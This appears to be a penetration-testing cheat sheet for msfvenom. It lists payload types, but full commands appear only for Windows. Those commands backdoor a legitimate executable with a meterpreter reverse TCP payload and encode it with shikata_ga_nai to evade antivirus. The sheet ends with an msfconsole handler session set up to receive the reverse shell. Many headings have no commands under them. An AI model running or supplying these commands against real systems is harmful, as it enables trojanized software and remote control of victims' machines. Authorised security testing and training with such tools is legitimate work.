MSFVenom
MsfVenom is a Metasploit standalone payload generator as a replacement for msfpayload and msfencode.
Creating Binaries
The following create different binaries for meterpreter and reverse TCP shells:
Creates a Reverse TCP Meterpreter Shell - Payload for Windows
Creates a simple HTTP Payload for Windows
Creates a simple TCP Shell for Linux
Creates a simple TCP Shell for Mac
Creates a simple TCP Payload for Android
Web Payloads
Creates a Simple TCP Shell for PHP
Creates a Simple TCP Shell for ASP
Creates a Simple TCP Shell for Javascrip
Creates a Simple TCP Shell for WAR
Windows Payloads
Lists all avalaible encoder
Binds an exe with a Payload (Backdoors an exe)
msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f exe > example.exe
Creates a simple TCP payload with shikata_ga_nai encoder
msfvenom -p windows/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -e x86/shikata_ga_nai -b ‘\x00’ -i 3 -f exe > example.exe
Binds an exe with a Payload and encodes it
msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -e x86/shikata_ga_nai -i 3 -b “\x00” -f exe > example.exe
Getting a Metepreter Shell
omar@ares:~$ sudo msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.123
lhost => 192.168.1.123
msf exploit(multi/handler) > set lport 4444
lport => 4444
msf exploit(multi/handler) > run